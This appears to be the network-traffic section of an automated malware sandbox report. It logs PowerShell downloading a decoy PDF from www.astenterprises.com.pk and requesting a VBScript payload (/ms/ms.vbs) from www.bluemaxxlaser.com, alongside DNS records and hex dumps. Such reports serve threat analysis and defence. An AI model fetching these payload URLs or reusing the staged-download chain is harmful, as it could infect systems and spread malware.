                                                                                                  Dec 19, 2024 12:50:59.651586056 CET49732443192.168.2.9107.161.23.150
                                                                                                  Dec 19, 2024 12:50:59.657496929 CET44349732107.161.23.150192.168.2.9
                                                                                                  Dec 19, 2024 12:50:59.657519102 CET44349732107.161.23.150192.168.2.9
                                                                                                  Dec 19, 2024 12:50:59.657636881 CET49732443192.168.2.9107.161.23.150
                                                                                                  Dec 19, 2024 12:50:59.657664061 CET44349732107.161.23.150192.168.2.9
                                                                                                  Dec 19, 2024 12:50:59.657721043 CET49732443192.168.2.9107.161.23.150
                                                                                                  Dec 19, 2024 12:50:59.663032055 CET44349732107.161.23.150192.168.2.9
                                                                                                  Dec 19, 2024 12:50:59.663057089 CET44349732107.161.23.150192.168.2.9
                                                                                                  Dec 19, 2024 12:50:59.663163900 CET49732443192.168.2.9107.161.23.150
                                                                                                  Dec 19, 2024 12:50:59.663213968 CET44349732107.161.23.150192.168.2.9
                                                                                                  Dec 19, 2024 12:50:59.663271904 CET49732443192.168.2.9107.161.23.150
                                                                                                  Dec 19, 2024 12:50:59.670149088 CET44349732107.161.23.150192.168.2.9
                                                                                                  Dec 19, 2024 12:50:59.670181990 CET44349732107.161.23.150192.168.2.9
                                                                                                  Dec 19, 2024 12:50:59.670358896 CET49732443192.168.2.9107.161.23.150
                                                                                                  Dec 19, 2024 12:50:59.670358896 CET49732443192.168.2.9107.161.23.150
                                                                                                  Dec 19, 2024 12:50:59.670389891 CET44349732107.161.23.150192.168.2.9
                                                                                                  Dec 19, 2024 12:50:59.670456886 CET49732443192.168.2.9107.161.23.150
                                                                                                  Dec 19, 2024 12:50:59.839889050 CET44349732107.161.23.150192.168.2.9
                                                                                                  Dec 19, 2024 12:50:59.839968920 CET44349732107.161.23.150192.168.2.9
                                                                                                  Dec 19, 2024 12:50:59.840022087 CET49732443192.168.2.9107.161.23.150
                                                                                                  Dec 19, 2024 12:50:59.840097904 CET44349732107.161.23.150192.168.2.9
                                                                                                  Dec 19, 2024 12:50:59.840138912 CET49732443192.168.2.9107.161.23.150
                                                                                                  Dec 19, 2024 12:50:59.840163946 CET49732443192.168.2.9107.161.23.150
                                                                                                  Dec 19, 2024 12:50:59.846029997 CET44349732107.161.23.150192.168.2.9
                                                                                                  Dec 19, 2024 12:50:59.846086025 CET44349732107.161.23.150192.168.2.9
                                                                                                  Dec 19, 2024 12:50:59.846158981 CET49732443192.168.2.9107.161.23.150
                                                                                                  Dec 19, 2024 12:50:59.846188068 CET44349732107.161.23.150192.168.2.9
                                                                                                  Dec 19, 2024 12:50:59.846223116 CET49732443192.168.2.9107.161.23.150
                                                                                                  Dec 19, 2024 12:50:59.846261024 CET49732443192.168.2.9107.161.23.150
                                                                                                  Dec 19, 2024 12:50:59.851258993 CET44349732107.161.23.150192.168.2.9
                                                                                                  Dec 19, 2024 12:50:59.851280928 CET44349732107.161.23.150192.168.2.9
                                                                                                  Dec 19, 2024 12:50:59.851358891 CET49732443192.168.2.9107.161.23.150
                                                                                                  Dec 19, 2024 12:50:59.851377964 CET44349732107.161.23.150192.168.2.9
                                                                                                  Dec 19, 2024 12:50:59.851449013 CET49732443192.168.2.9107.161.23.150
                                                                                                  Dec 19, 2024 12:50:59.857311010 CET44349732107.161.23.150192.168.2.9
                                                                                                  Dec 19, 2024 12:50:59.857350111 CET44349732107.161.23.150192.168.2.9
                                                                                                  Dec 19, 2024 12:50:59.857444048 CET49732443192.168.2.9107.161.23.150
                                                                                                  Dec 19, 2024 12:50:59.857467890 CET44349732107.161.23.150192.168.2.9
                                                                                                  Dec 19, 2024 12:50:59.857497931 CET49732443192.168.2.9107.161.23.150
                                                                                                  Dec 19, 2024 12:50:59.857531071 CET49732443192.168.2.9107.161.23.150
                                                                                                  Dec 19, 2024 12:50:59.865401030 CET44349732107.161.23.150192.168.2.9
                                                                                                  Dec 19, 2024 12:50:59.865422964 CET44349732107.161.23.150192.168.2.9
                                                                                                  Dec 19, 2024 12:50:59.865516901 CET49732443192.168.2.9107.161.23.150
                                                                                                  Dec 19, 2024 12:50:59.865516901 CET49732443192.168.2.9107.161.23.150
                                                                                                  Dec 19, 2024 12:50:59.865536928 CET44349732107.161.23.150192.168.2.9
                                                                                                  Dec 19, 2024 12:50:59.865597010 CET49732443192.168.2.9107.161.23.150
                                                                                                  Dec 19, 2024 12:51:00.032955885 CET44349732107.161.23.150192.168.2.9
                                                                                                  Dec 19, 2024 12:51:00.032984018 CET44349732107.161.23.150192.168.2.9
                                                                                                  Dec 19, 2024 12:51:00.033142090 CET49732443192.168.2.9107.161.23.150
                                                                                                  Dec 19, 2024 12:51:00.033193111 CET44349732107.161.23.150192.168.2.9
                                                                                                  Dec 19, 2024 12:51:00.033252001 CET49732443192.168.2.9107.161.23.150
                                                                                                  Dec 19, 2024 12:51:00.038789988 CET44349732107.161.23.150192.168.2.9
                                                                                                  Dec 19, 2024 12:51:00.038809061 CET44349732107.161.23.150192.168.2.9
                                                                                                  Dec 19, 2024 12:51:00.038891077 CET49732443192.168.2.9107.161.23.150
                                                                                                  Dec 19, 2024 12:51:00.038918018 CET44349732107.161.23.150192.168.2.9
                                                                                                  Dec 19, 2024 12:51:00.038974047 CET49732443192.168.2.9107.161.23.150
                                                                                                  Dec 19, 2024 12:51:00.044667006 CET44349732107.161.23.150192.168.2.9
                                                                                                  Dec 19, 2024 12:51:00.044687986 CET44349732107.161.23.150192.168.2.9
                                                                                                  Dec 19, 2024 12:51:00.044779062 CET49732443192.168.2.9107.161.23.150
                                                                                                  Dec 19, 2024 12:51:00.044804096 CET44349732107.161.23.150192.168.2.9
                                                                                                  Dec 19, 2024 12:51:00.044871092 CET49732443192.168.2.9107.161.23.150
                                                                                                  Dec 19, 2024 12:51:00.050751925 CET44349732107.161.23.150192.168.2.9
                                                                                                  Dec 19, 2024 12:51:00.050771952 CET44349732107.161.23.150192.168.2.9
                                                                                                  Dec 19, 2024 12:51:00.050851107 CET49732443192.168.2.9107.161.23.150
                                                                                                  Dec 19, 2024 12:51:00.050869942 CET44349732107.161.23.150192.168.2.9
                                                                                                  Dec 19, 2024 12:51:00.050934076 CET49732443192.168.2.9107.161.23.150
                                                                                                  Dec 19, 2024 12:51:00.051592112 CET44349732107.161.23.150192.168.2.9
                                                                                                  Dec 19, 2024 12:51:00.051652908 CET49732443192.168.2.9107.161.23.150
                                                                                                  Dec 19, 2024 12:51:00.051789045 CET44349732107.161.23.150192.168.2.9
                                                                                                  Dec 19, 2024 12:51:00.051850080 CET49732443192.168.2.9107.161.23.150
                                                                                                  Dec 19, 2024 12:51:00.051868916 CET44349732107.161.23.150192.168.2.9
                                                                                                  Dec 19, 2024 12:51:00.051918030 CET49732443192.168.2.9107.161.23.150
                                                                                                  Dec 19, 2024 12:51:00.054368019 CET49732443192.168.2.9107.161.23.150
                                                                                                  Dec 19, 2024 12:51:00.320839882 CET4974980192.168.2.9203.175.174.69
                                                                                                  Dec 19, 2024 12:51:00.440649033 CET8049749203.175.174.69192.168.2.9
                                                                                                  Dec 19, 2024 12:51:00.440740108 CET4974980192.168.2.9203.175.174.69
                                                                                                  Dec 19, 2024 12:51:00.440952063 CET4974980192.168.2.9203.175.174.69
                                                                                                  Dec 19, 2024 12:51:00.560724020 CET8049749203.175.174.69192.168.2.9
                                                                                                  Dec 19, 2024 12:51:01.974553108 CET8049749203.175.174.69192.168.2.9
                                                                                                  Dec 19, 2024 12:51:02.024626017 CET4974980192.168.2.9203.175.174.69
                                                                                                  Dec 19, 2024 12:51:03.526397943 CET4974980192.168.2.9203.175.174.69

                                                                                                  UDP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Dec 19, 2024 12:50:54.974740028 CET6329853192.168.2.91.1.1.1
                                                                                                  Dec 19, 2024 12:50:55.113065958 CET53632981.1.1.1192.168.2.9
                                                                                                  Dec 19, 2024 12:51:00.181982994 CET6426653192.168.2.91.1.1.1
                                                                                                  Dec 19, 2024 12:51:00.319600105 CET53642661.1.1.1192.168.2.9
                                                                                                  Dec 19, 2024 12:51:10.962281942 CET6407053192.168.2.91.1.1.1

                                                                                                  DNS Queries

                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                  Dec 19, 2024 12:50:54.974740028 CET192.168.2.91.1.1.10xdb32Standard query (0)www.astenterprises.com.pkA (IP address)IN (0x0001)false
                                                                                                  Dec 19, 2024 12:51:00.181982994 CET192.168.2.91.1.1.10x84d6Standard query (0)www.bluemaxxlaser.comA (IP address)IN (0x0001)false
                                                                                                  Dec 19, 2024 12:51:10.962281942 CET192.168.2.91.1.1.10xc46fStandard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false

                                                                                                  DNS Answers

                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                  Dec 19, 2024 12:50:41.252111912 CET1.1.1.1192.168.2.90x28e9No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                  Dec 19, 2024 12:50:41.252111912 CET1.1.1.1192.168.2.90x28e9No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                  Dec 19, 2024 12:50:55.113065958 CET1.1.1.1192.168.2.90xdb32No error (0)www.astenterprises.com.pkastenterprises.com.pkCNAME (Canonical name)IN (0x0001)false
                                                                                                  Dec 19, 2024 12:50:55.113065958 CET1.1.1.1192.168.2.90xdb32No error (0)astenterprises.com.pk107.161.23.150A (IP address)IN (0x0001)false
                                                                                                  Dec 19, 2024 12:51:00.319600105 CET1.1.1.1192.168.2.90x84d6No error (0)www.bluemaxxlaser.com203.175.174.69A (IP address)IN (0x0001)false
                                                                                                  Dec 19, 2024 12:51:11.100058079 CET1.1.1.1192.168.2.90xc46fNo error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                  Dec 19, 2024 12:51:12.883239985 CET1.1.1.1192.168.2.90x1a3cNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                                                                                                  Dec 19, 2024 12:51:12.883239985 CET1.1.1.1192.168.2.90x1a3cNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.212.68A (IP address)IN (0x0001)false
                                                                                                  Dec 19, 2024 12:51:12.883239985 CET1.1.1.1192.168.2.90x1a3cNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.100A (IP address)IN (0x0001)false
                                                                                                  Dec 19, 2024 12:51:12.883239985 CET1.1.1.1192.168.2.90x1a3cNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.101A (IP address)IN (0x0001)false
                                                                                                  Dec 19, 2024 12:51:12.883239985 CET1.1.1.1192.168.2.90x1a3cNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.99A (IP address)IN (0x0001)false
                                                                                                  Dec 19, 2024 12:51:12.883239985 CET1.1.1.1192.168.2.90x1a3cNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.20A (IP address)IN (0x0001)false
                                                                                                  Dec 19, 2024 12:51:12.883239985 CET1.1.1.1192.168.2.90x1a3cNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.98A (IP address)IN (0x0001)false
                                                                                                  Dec 19, 2024 12:51:25.583424091 CET1.1.1.1192.168.2.90x9695No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                                                                                                  Dec 19, 2024 12:51:25.583424091 CET1.1.1.1192.168.2.90x9695No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.212.68A (IP address)IN (0x0001)false
                                                                                                  Dec 19, 2024 12:51:25.583424091 CET1.1.1.1192.168.2.90x9695No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.100A (IP address)IN (0x0001)false
                                                                                                  Dec 19, 2024 12:51:25.583424091 CET1.1.1.1192.168.2.90x9695No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.101A (IP address)IN (0x0001)false
                                                                                                  Dec 19, 2024 12:51:25.583424091 CET1.1.1.1192.168.2.90x9695No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.20A (IP address)IN (0x0001)false
                                                                                                  Dec 19, 2024 12:51:25.583424091 CET1.1.1.1192.168.2.90x9695No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.98A (IP address)IN (0x0001)false
                                                                                                  Dec 19, 2024 12:51:25.583424091 CET1.1.1.1192.168.2.90x9695No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.99A (IP address)IN (0x0001)false
                                                                                                  Dec 19, 2024 12:51:49.693660021 CET1.1.1.1192.168.2.90x2685No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                                                                                                  Dec 19, 2024 12:51:49.693660021 CET1.1.1.1192.168.2.90x2685No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.99A (IP address)IN (0x0001)false
                                                                                                  Dec 19, 2024 12:51:49.693660021 CET1.1.1.1192.168.2.90x2685No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.101A (IP address)IN (0x0001)false
                                                                                                  Dec 19, 2024 12:51:49.693660021 CET1.1.1.1192.168.2.90x2685No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.208.74A (IP address)IN (0x0001)false
                                                                                                  Dec 19, 2024 12:51:49.693660021 CET1.1.1.1192.168.2.90x2685No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.100A (IP address)IN (0x0001)false
                                                                                                  Dec 19, 2024 12:51:49.693660021 CET1.1.1.1192.168.2.90x2685No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.98A (IP address)IN (0x0001)false
                                                                                                  Dec 19, 2024 12:52:37.863223076 CET1.1.1.1192.168.2.90x893aNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                  Dec 19, 2024 12:52:37.863223076 CET1.1.1.1192.168.2.90x893aNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false

                                                                                                  HTTP Request Dependency Graph

                                                                                                  • www.astenterprises.com.pk
                                                                                                  • www.bluemaxxlaser.com

                                                                                                  HTTP Packets

                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  0192.168.2.949749203.175.174.6980528C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 19, 2024 12:51:00.440952063 CET80OUTGET /ms/ms.vbs HTTP/1.1
                                                                                                  Host: www.bluemaxxlaser.com
                                                                                                  Connection: Keep-Alive
                                                                                                  Dec 19, 2024 12:51:01.974553108 CET516INHTTP/1.1 404 Not Found
                                                                                                  Date: Thu, 19 Dec 2024 11:51:01 GMT
                                                                                                  Server: Apache
                                                                                                  Content-Length: 315
                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                  Connection: Keep-Alive
                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                  HTTPS Proxied Packets

                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  0192.168.2.949732107.161.23.150443528C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-12-19 11:50:56 UTC127OUTGET /ms/List%20of%20required%20items%20and%20services.pdf HTTP/1.1
                                                                                                  Host: www.astenterprises.com.pk
                                                                                                  Connection: Keep-Alive
                                                                                                  2024-12-19 11:50:56 UTC217INHTTP/1.1 200 OK
                                                                                                  Connection: close
                                                                                                  content-type: application/pdf
                                                                                                  last-modified: Sun, 28 Jan 2024 19:03:01 GMT
                                                                                                  accept-ranges: bytes
                                                                                                  content-length: 871324
                                                                                                  date: Thu, 19 Dec 2024 11:50:56 GMT
                                                                                                  server: LiteSpeed
                                                                                                  2024-12-19 11:50:56 UTC16384INData Raw: 25 50 44 46 2d 31 2e 37 0d 25 e2 e3 cf d3 0d 0a 31 32 39 20 30 20 6f 62 6a 0d 3c 3c 2f 4c 69 6e 65 61 72 69 7a 65 64 20 31 2f 4c 20 36 35 33 32 34 38 2f 4f 20 31 33 31 2f 45 20 38 36 34 32 33 2f 4e 20 35 2f 54 20 36 35 32 37 37 30 2f 48 20 5b 20 34 39 37 20 32 37 33 5d 3e 3e 0d 65 6e 64 6f 62 6a 0d 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 31 34 33 20 30 20 6f 62 6a 0d 3c 3c 2f 44 65 63 6f 64 65 50 61 72 6d 73 3c 3c 2f 43 6f 6c 75 6d 6e 73 20 35 2f 50 72 65 64 69 63 74 6f 72 20 31 32 3e 3e 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 49 44 5b 3c 45 33 39 35 37 36 43 34 37 35 41 42 45 43 34 33 41 31 38 37 42 39 44 37 38 30 43 34 37 35 37 44 3e 3c 36 34 31 43 41 32 38 37 30 33 43 34 42 31 34 34 38 38 36 46 33 34 32 30 32 33 42 33 34 35
                                                                                                  Data Ascii: %PDF-1.7%129 0 obj<</Linearized 1/L 653248/O 131/E 86423/N 5/T 652770/H [ 497 273]>>endobj 143 0 obj<</DecodeParms<</Columns 5/Predictor 12>>/Filter/FlateDecode/ID[<E39576C475ABEC43A187B9D780C4757D><641CA28703C4B144886F342023B345
                                                                                                  2024-12-19 11:50:57 UTC16384INData Raw: 4b 4b 4b f4 b8 e9 cf 0b a9 9e 76 d3 14 23 28 9c 68 17 25 44 45 32 9b e4 30 63 de da 74 55 51 91 17 0f 23 b9 74 42 79 99 8f 15 a5 ab 6a 2d 56 56 3a 41 91 9b da fa 0f ac 3d b1 66 fa f2 fe 83 1f ae 7f f5 f4 91 8d 1b 8f 1c 79 71 63 43 8e f6 13 91 4c 3d ba a0 bb 30 72 b9 50 28 fc b1 6b ef 29 f2 46 e1 b5 4f 6f 93 56 b2 fc d6 f7 7f 8a 68 bc 82 40 bb 8f 18 d3 88 9b 23 ac 5b 1b 5f f9 98 a0 8d 65 0b c6 04 6d 34 17 e3 49 b1 4b 9a 05 db b4 aa db c4 4d 74 17 dd e7 12 8f 8a 44 05 59 a2 82 2a 11 83 92 4b 9a 93 5d 8d ef 13 90 04 7a cd 8f 5c 75 ce 6c 14 6e da 96 03 d7 98 03 57 b7 03 57 cc 96 1d e6 60 1c 43 9c 83 be 88 21 d9 a6 a7 5a e2 b6 dc dc 96 44 12 92 2d 51 29 ac 9f 21 19 b2 05 46 a9 ba 6a 74 47 9c 0b 07 a3 b5 30 cb 0f c6 7a be 33 90 c3 d2 e3 5c 51 1b 63 53 65 5b 92
                                                                                                  Data Ascii: KKKv#(h%DE20ctUQ#tByj-VV:A=fyqcCL=0rP(k)FOoVh@#[_em4IKMtDY*K]z\ulnWW`C!ZD-Q)!FjtG0z3\QcSe[
                                                                                                  2024-12-19 11:50:57 UTC16384INData Raw: ed 2b 5d eb ed eb 5d 1c 2a ad 66 a8 50 9d 10 15 d2 5d 0e 75 89 22 17 a4 6d 26 47 51 ca 35 42 88 c3 b3 09 47 4c 80 b6 92 8c b5 95 6c 19 f8 f6 d9 f7 91 fa dc ad 57 af 4d dc fe d5 c9 be 57 4e 0e ee ea 3b c9 fa 50 6a f7 f6 89 bf 8d 5f bc f5 0d 14 41 ee 0b e7 2f fc f9 ec f9 73 e4 27 f5 4d 74 70 75 84 2a 2f 13 41 57 a8 0a f5 4a f8 01 fc 45 dc 8a b9 5c f4 78 94 ad 8d 4e 93 e2 35 99 40 a6 66 61 cd e6 68 7f d4 d9 1c 6c 36 96 05 97 19 ab 9d 6b a5 62 b0 68 74 3a 37 49 1d b8 3b b8 c9 18 89 5e f2 5f d5 ae 86 2e 45 6e f8 6f 44 ae 47 27 a3 6a 9c 6b c4 8d 81 59 5c 33 7e 98 5b 86 d7 e0 bf 8b b7 6a 26 b0 a8 c8 36 35 1c 06 a3 55 c3 b2 c8 c8 7a 15 50 ba 05 28 7d 0a a8 70 41 4f 8c 0a 08 0b 79 a1 5d d8 29 70 51 8a 55 94 22 26 0c 4f 8e e5 45 80 4b d0 2a 9f c1 70 69 f1 31 e5 4b
                                                                                                  Data Ascii: +]]*fP]u"m&GQ5BGLlWMWN;Pj_A/s'Mtpu*/AWJE\xN5@fahl6kbht:7I;^_.EnoDG'jkY\3~[j&65UzP(}pAOy])pQU"&OEK*pi1K
                                                                                                  2024-12-19 11:50:57 UTC16384INData Raw: f0 0a e0 02 58 65 b0 11 40 67 2b c0 87 c0 35 fc 13 79 8d 58 c0 10 a0 b2 bf 79 e8 c6 67 1f 79 46 9e e7 3a d8 5f d9 fb 64 23 66 fc 2f ec 03 c9 1f 62 57 13 fc 67 f6 ae e4 2b e0 38 78 85 bd e7 c5 39 c9 b5 22 4f 50 27 22 4e 29 e0 34 f2 f7 b1 77 e6 ba a3 bc 9e 6b c7 f1 1c 8f 19 36 0d 64 81 41 60 0c 98 05 5a d8 25 d6 e5 3d c5 a3 68 64 89 ac e0 fd e7 cc 23 5f 4b 7e 8d bc aa 12 eb 19 6e 19 7b b1 00 75 61 8c dd 8f c2 83 39 a7 9f 33 98 65 9c f9 23 8a c2 18 a7 7f 0b 4f 18 e3 97 bf 81 27 8c f1 b3 13 f0 84 31 9e 3b 06 4f 18 e3 a9 67 e0 09 63 8c 8e c1 13 c6 18 1c 81 07 e3 b3 97 df ea fe 31 cf 0c 3e 4b f5 5c 98 cd 60 96 66 30 4b 33 98 a5 19 12 64 33 e2 47 6e 07 c5 d8 fe e4 f5 f4 60 c6 ce 5a e6 e6 1e ee 2c 52 e7 6d ea ec a7 ce ab d4 99 a4 ce 71 ea 9c a0 ce 1e ea 1c a2 8e
                                                                                                  Data Ascii: Xe@g+5yXygyF:_d#f/bWg+8x9"OP'"N)4wk6dA`Z%=hd#_K~n{ua93e#O'1;Ogc1>K\`f0K3d3Gn`Z,Rmq
                                                                                                  2024-12-19 11:50:57 UTC16384INData Raw: e6 09 e6 76 33 e7 20 39 5e d7 78 5c 72 bd 06 f7 03 59 e9 3e 2d 95 8a b9 83 39 2b 4d 32 5a 61 cf 2e f3 cb 65 b2 fb 90 ac 63 6f ef a1 bc c6 ed 21 4b fd 91 c4 9b 86 33 5f 20 23 19 ff 3c c6 9a 44 ce d9 ac df cc 33 8c 73 34 a2 45 46 69 ce e6 3f 28 cd de 50 6c 32 6a e3 d5 61 e7 b7 73 2e 74 1f 6e 92 02 3f 87 75 3e ab 77 4d 78 18 bd 03 a8 d6 fd 61 af b3 fc 7b d8 7b a4 de 55 9c d7 a9 e6 59 d6 e5 b0 3d 47 55 71 1d 1d 72 4c 4b 78 9a f1 b2 e8 9b 85 14 fa ab cc e1 7f 39 cc b7 27 ef f3 fd 27 a5 80 3b b0 98 fb 6c 8a 5f c2 7a ed 95 6e f6 ae 65 fd fd e1 32 d0 ea 73 44 1a 33 72 39 2b bf 97 89 de 11 fa 6f 0a 5b bd de d8 60 0f b9 87 b6 33 19 6b 86 de 8b cc ab 21 73 b6 38 e6 a3 f0 44 e0 c9 4d c6 c8 f5 fc c3 f3 7e 9c d4 55 63 44 7c 64 a1 5b 2c 23 9d 33 52 18 4c a7 ff e7 ac 41
                                                                                                  Data Ascii: v3 9^x\rY>-9+M2Za.eco!K3_ #<D3s4EFi?(Pl2jas.tn?u>wMxa{{UY=GUqrLKx9'';l_zne2sD3r9+o[`3k!s8DM~UcD|d[,#3RLA
                                                                                                  2024-12-19 11:50:57 UTC16384INData Raw: 0c 0c 0b 0a 0b 0b 0d 0e 12 10 0d 0e 11 0e 0b 0b 10 16 10 11 13 14 15 15 15 0c 0f 17 18 16 14 18 12 14 15 14 ff db 00 43 01 03 04 04 05 04 05 09 05 05 09 14 0d 0b 0d 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 ff c0 00 11 08 00 3f 00 c0 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66
                                                                                                  Data Ascii: C?"}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdef
                                                                                                  2024-12-19 11:50:57 UTC16384INData Raw: 42 63 f6 91 ac 1c 27 a7 50 cf 3e 4d fa d1 56 75 d0 ba c5 64 81 1a e6 4c e6 58 0c d5 26 8d 98 fa 33 16 57 24 7e ce 0d 4d b4 4e e0 f1 9d a4 83 d6 ad f8 85 85 a3 92 91 35 88 bd 03 2b 42 68 57 83 ca 8b eb 0a 26 10 84 26 17 0f 24 e1 b0 a4 2a f0 34 91 e7 9e c9 ab bc 37 82 b3 3c e6 68 87 ab e0 87 8c 95 38 94 3f 89 f6 74 69 2e 63 10 88 29 1a de d4 82 08 7f 0f d5 a4 1b 8d 61 79 c7 6f 9d e0 37 4a 89 38 17 e9 e4 95 dd 0d 7d 4f b3 30 56 d1 0f 1c 57 76 69 e3 4b 9b 0b d3 f3 e3 1a d9 e4 26 c2 70 53 39 67 76 0d 9f 1c f4 20 16 3a db 45 1d c7 b7 5c d1 9f 30 3d 72 3f aa ba 3c 22 fd 70 1b 45 03 b3 43 32 bf d8 82 1f e4 4f 1d 0f 11 35 f9 12 53 6d 59 4a 7b 27 f0 ef 43 32 e2 85 41 65 c5 a3 51 82 27 2e 9e 0e 45 46 7d 6b 32 7c 43 4a 16 e0 ee b0 58 c2 df 44 9e b6 f4 11 a9 53 55 b4
                                                                                                  Data Ascii: Bc'P>MVudLX&3W$~MN5+BhW&&$*47<h8?ti.c)ayo7J8}O0VWviK&pS9gv :E\0=r?<"pEC2O5SmYJ{'C2AeQ'.EF}k2|CJXDSU
